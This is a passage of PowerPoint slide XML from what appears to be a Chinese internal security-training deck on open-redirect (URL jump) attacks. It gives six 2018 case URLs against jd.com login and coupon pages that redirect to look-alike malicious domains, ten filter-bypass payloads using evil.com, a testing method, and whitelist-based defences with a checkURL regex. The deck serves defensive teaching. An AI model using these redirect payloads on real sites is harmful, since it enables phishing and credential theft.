              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="30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6" name="MH_SubTitle_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId19"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1536829" y="3007038"/>
              <a:ext cx="3723159" cy="557719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l">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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M</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US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站登录模块URL跳转漏洞</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="组合 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5972151" y="942058"/>
            <a:ext cx="4191439" cy="776093"/>
            <a:chOff x="1016148" y="3070390"/>
            <a:chExt cx="3695552" cy="684378"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="MH_Other_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId16"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1016148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2</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="30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2" name="MH_SubTitle_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId17"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1536700" y="3070390"/>
              <a:ext cx="3175000" cy="557828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lang="zh-CN" altLang="en-US" sz="14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shop.m.jd.com </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="14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URL跳转漏洞</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="组合 22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="92592" y="2664487"/>
            <a:ext cx="4191439" cy="847847"/>
            <a:chOff x="1016148" y="3007115"/>
            <a:chExt cx="3695552" cy="747653"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="MH_Other_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId14"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1016148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0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3</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="30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5" name="MH_SubTitle_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId15"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1536700" y="3007115"/>
              <a:ext cx="3175000" cy="557828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账户验证页面存在url跳转漏洞</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="26" name="组合 25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5972151" y="2655342"/>
            <a:ext cx="4191439" cy="776093"/>
            <a:chOff x="1016148" y="3196940"/>
            <a:chExt cx="3695552" cy="684378"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="MH_Other_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId12"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1016148" y="329597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4</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="30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8" name="MH_SubTitle_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId13"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1536700" y="3196940"/>
              <a:ext cx="3175000" cy="557828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lang="zh-CN" altLang="en-US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passport.m.jd.com</a:t>
              </a:r>
              <a:r>
                <a:rPr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存在url跳转漏洞</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="12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>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="92591" y="4552226"/>
            <a:ext cx="4191439" cy="776093"/>
            <a:chOff x="763084" y="3070390"/>
            <a:chExt cx="3695552" cy="684378"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="MH_Other_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="763084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0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5</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="30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31" name="MH_SubTitle_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId11"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1283636" y="3070390"/>
              <a:ext cx="3175000" cy="557828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lang="zh-CN" altLang="en-US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M站优惠券模块</a:t>
              </a:r>
              <a:r>
                <a:rPr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有URL跳转漏洞</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="12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just">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr sz="12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2" name="组合 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5972151" y="4408464"/>
            <a:ext cx="4191439" cy="847847"/>
            <a:chOff x="1016148" y="3007115"/>
            <a:chExt cx="3695552" cy="747653"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="MH_Other_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId8"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1016148" y="3169425"/>
              <a:ext cx="418868" cy="585343"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1102816 w 1383856"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1933849"/>
                <a:gd name="connsiteX1" fmla="*/ 1383856 w 1383856"/>
                <a:gd name="connsiteY1" fmla="*/ 372951 h 1933849"/>
                <a:gd name="connsiteX2" fmla="*/ 1331288 w 1383856"/>
                <a:gd name="connsiteY2" fmla="*/ 372951 h 1933849"/>
                <a:gd name="connsiteX3" fmla="*/ 1094554 w 1383856"/>
                <a:gd name="connsiteY3" fmla="*/ 58794 h 1933849"/>
                <a:gd name="connsiteX4" fmla="*/ 58794 w 1383856"/>
                <a:gd name="connsiteY4" fmla="*/ 839295 h 1933849"/>
                <a:gd name="connsiteX5" fmla="*/ 839295 w 1383856"/>
                <a:gd name="connsiteY5" fmla="*/ 1875055 h 1933849"/>
                <a:gd name="connsiteX6" fmla="*/ 1256196 w 1383856"/>
                <a:gd name="connsiteY6" fmla="*/ 1560897 h 1933849"/>
                <a:gd name="connsiteX7" fmla="*/ 1325955 w 1383856"/>
                <a:gd name="connsiteY7" fmla="*/ 1560897 h 1933849"/>
                <a:gd name="connsiteX8" fmla="*/ 831032 w 1383856"/>
                <a:gd name="connsiteY8" fmla="*/ 1933849 h 1933849"/>
                <a:gd name="connsiteX9" fmla="*/ 0 w 1383856"/>
                <a:gd name="connsiteY9" fmla="*/ 831032 h 19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56" h="1933849">
                  <a:moveTo>
                    <a:pt x="1102816" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1383856" y="372951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1331288" y="372951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1094554" y="58794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58794" y="839295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="839295" y="1875055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1256196" y="1560897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1325955" y="1560897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="831032" y="1933849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="83103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237758" tIns="0" rIns="0" bIns="0" anchor="ctr">
              <a:normAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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rPr>
                <a:t>6</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="30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34" name="MH_SubTitle_1"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1536700" y="3007115"/>
              <a:ext cx="3175000" cy="557828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/>
            <a:p>
              <a:pPr algn="just">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr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reason参数有URL跳转漏洞</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="12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593090" y="1442085"/>
            <a:ext cx="476885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http://m.jd.com/user/login.action?</a:t>
            </a:r>
            <a:r>
              <a:rPr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returnurl=http://wq.jd.com.baidu.com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&amp;appid=100&amp;</a:t>
            </a:r>
          </a:p>
          <a:p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若程序判断域名以包含</a:t>
            </a:r>
            <a:r>
              <a:rPr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wq.jd.com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为合法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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URL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，构造恶意站点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http://wq.jd.com.baidu.com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会绕过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URL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检查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482080" y="1442085"/>
            <a:ext cx="455168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http://shop.m.jd.com/sales/doLogin.action?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returnUrl=https%3A%2F%2Fxjd.com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URL解码：returnUrl=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https://xjd.com</a:t>
            </a:r>
          </a:p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若程序判断域名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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*jd.com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为合法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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URL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，构造恶意站点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xjd.com会绕过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URL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检查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WVS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无法发现此漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="593090" y="3144520"/>
            <a:ext cx="491680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https://wqs.jd.com/my/checkaccount.shtml?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rurl=https://www.baidu.com?pages/pingou/account/index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&amp;wid=5032261827&amp;sceneid=12345&amp;curpin=amRfNWU0NGFhMjFlODM3MQ==&amp;PwdMdfToken=1e18ddc652cec0ff0a7fb5f684f3b369&amp;wxappver=2.2.1</a:t>
            </a:r>
          </a:p>
          <a:p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若程序判断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URL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包含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pages/pingou/account/index为合法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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URL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，将其当成参数会绕过访问控制</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6482080" y="3144520"/>
            <a:ext cx="455168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https://passport.m.jd.com/user/login.action?sid=&amp;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returnurl=http%3A%2F%2Fjd.com.letus.cc%23p.m.jd.com%2Fcart%2Fcart.action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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URL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解码：http://jd.com.letus.cc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#p.m.jd.com/cart/cart.action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l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#代表网页中的一个位置，浏览器读取后会将位置滚动至该位置。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6482080" y="4824730"/>
            <a:ext cx="500380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http://wq.jd.com/mlogin/wxv3/redirect_3rd?code=authdeny&amp;g_tk=1166071504&amp;g_ty=ls&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="12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reason=/%5cwww.baidu.com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&amp;state=C69915ECE1D69B70B83A6FB74D3A7B69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利用参数：reason=/%5cwww.baidu.com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3090" y="4878070"/>
            <a:ext cx="476885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http://coupon.m.jd.com/http%3a//i8rr5nukmbkc8m2xv6ejwiq08reia60urmec21.burpcollaborator.net/%3funion?mtm_source=kepler-m&amp;mtm_subsource=30a8d67966b144ada41ad1ce3f4b0972&amp;mopenbp6=1&amp;mopenbp8=3338&amp;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returl=https://union-click.jd.com.example.com/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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WVS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无法发现此漏洞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504190" y="503555"/>
            <a:ext cx="6120765" cy="32385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rgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>跳转</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>——2018</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>部门案例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC33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628015" y="1250950"/>
            <a:ext cx="10197465" cy="47269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测试方法</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr 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查看响应消息中是否有以300～307开头的响应消息，特别是301和302。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l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2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如果存在，是否有参数用作重定向，如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rurl、returnurl、returl、returnUrl、url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等。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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）使用上一页案例中的验证例子（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https://xjd.com、</a:t>
            </a:r>
            <a:r>
              <a:rPr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http://wq.jd.com.baidu.com</a:t>
            </a:r>
            <a:r>
              <a:rPr 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等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进行验证</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"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再观察这个请求是否被重定向。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr 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绕过验证的方法</a:t>
            </a:r>
            <a:endParaRPr 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1. 单斜线"/"绕过：https://www.landgrey.me/redirect.php?url=/www.evil.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"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2. 缺少协议绕过：https://www.landgrey.me/redirect.php?url=//www.evil.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"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3. 多斜线"/"前缀绕过：https://www.landgrey.me/redirect.php?url=///www.evil.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"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4. 利用"@"符号绕过：https://www.landgrey.me/redirect.php?url=https://www.landgrey.me@www.evil.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"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5. 利用反斜线"\"绕过：https://www.landgrey.me/redirect.php?url=https://www.evil.com\www.landgrey.me</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"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6. 利用"#"符号绕过：https://www.landgrey.me/redirect.php?url=https://www.evil.com#www.landgrey.me</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"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7. 利用"?"号绕过：https://www.landgrey.me/redirect.php?url=https://www.evil.com?www.landgrey.me</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"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8. 利用"\\"绕过：https://www.landgrey.me/redirect.php?url=https://www.evil.com\\www.landgrey.me</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"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9. 利用"."绕过：https://www.landgrey.me/redirect.php?url=.evil (可能会跳转到www.landgrey.me.evil域名)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"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10.重复特殊字符绕过：https://www.landgrey.me/redirect.php?url=///www.evil.com//..</a:t>
            </a:r>
            <a:endParaRPr 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  <a:buNone/>
            </a:pP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</a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pP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参考链接：https://blog.csdn.net/fjb2080/article/details/80327309</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504190" y="503555"/>
            <a:ext cx="6120765" cy="32385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rgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>跳转</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC33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C3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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628015" y="1250950"/>
            <a:ext cx="10197465" cy="264858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</a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc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防御方法</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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1）对跳转链接进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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白名单限制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，例如，只允许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wq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.jd.com域名下的链接进行跳转</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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2）在跳转的时候对url进行按规则校验：即控制url是否是公司授权的白名单或者是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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符合公司规则的url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</a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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function checkURL ( sURL) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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return (/^(https?:\/\/)?[\w\-.]+\.(yourDomainA|yourDomainB|yourDomainC)\.com($|\/|\\)/i).test(sUrl)||(/^[\w][\w\/\.\-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</a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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_%]+$/i).test(sUrl)||(/^[\/\\][^\/\\]/i).test(sUrl) ? true : false;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr 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3）想办法怎么不被上一页PPT的例子绕过</a:t>
            </a:r>
            <a:endParaRPr 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文本占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504190" y="503555"/>
            <a:ext cx="6120765" cy="32385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rgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>跳转</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC33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C3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>防御</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6882" y="2367064"/>
            <a:ext cx="11520311" cy="1323036"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 9144000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1076325"/>
              <a:gd name="connsiteX1" fmla="*/ 7058024 w 9144000"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1076325"/>
              <a:gd name="connsiteX2" fmla="*/ 7058024 w 9144000"/>
              <a:gd name="connsiteY2" fmla="*/ 973931 h 1076325"/>
              <a:gd name="connsiteX3" fmla="*/ 8354024 w 9144000"/>
              <a:gd name="connsiteY3" fmla="*/ 973931 h 1076325"/>
              <a:gd name="connsiteX4" fmla="*/ 8354024 w 9144000"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1076325"/>
              <a:gd name="connsiteX5" fmla="*/ 9144000 w 9144000"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 1076325"/>
              <a:gd name="connsiteX6" fmla="*/ 9144000 w 9144000"/>
              <a:gd name="connsiteY6" fmla="*/ 1076325 h 1076325"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 9144000"/>
              <a:gd name="connsiteY7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076325">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7058024" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7058024" y="973931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8354024" y="973931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8354024" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="1076325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1076325"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FA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025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882" y="2577070"/>
            <a:ext cx="8886240" cy="898525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535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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>越权访问</a:t>
            </a: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8989125" y="2056556"/>
            <a:ext cx="1452039" cy="1419038"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1152000"/>
              <a:gd name="connsiteX1" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1152000"/>
              <a:gd name="connsiteX2" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY2" fmla="*/ 1152000 h 1152000"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY3" fmla="*/ 1152000 h 1152000"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1152000"/>
              <a:gd name="connsiteX0-1" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY0-2" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX1-3" fmla="*/ 323289 w 1152000"/>
              <a:gd name="connsiteY1-4" fmla="*/ 0 h 1154343"/>
              <a:gd name="connsiteX2-5" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY2-6" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX3-7" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY3-8" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX4-9" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY4-10" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY5" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX0-11" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY0-12" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX1-13" fmla="*/ 323289 w 1152000"/>
              <a:gd name="connsiteY1-14" fmla="*/ 0 h 1154343"/>
              <a:gd name="connsiteX2-15" fmla="*/ 825732 w 1152000"/>
              <a:gd name="connsiteY2-16" fmla="*/ 1 h 1154343"/>
              <a:gd name="connsiteX3-17" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY3-18" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX4-19" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY4-20" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX5-21" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY5-22" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY6" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX0-23" fmla="*/ 825732 w 1152000"/>
              <a:gd name="connsiteY0-24" fmla="*/ 1 h 1154343"/>
              <a:gd name="connsiteX1-25" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY1-26" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX2-27" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY2-28" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX3-29" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY3-30" fmla="*/ 1154343 h 1154343"/>
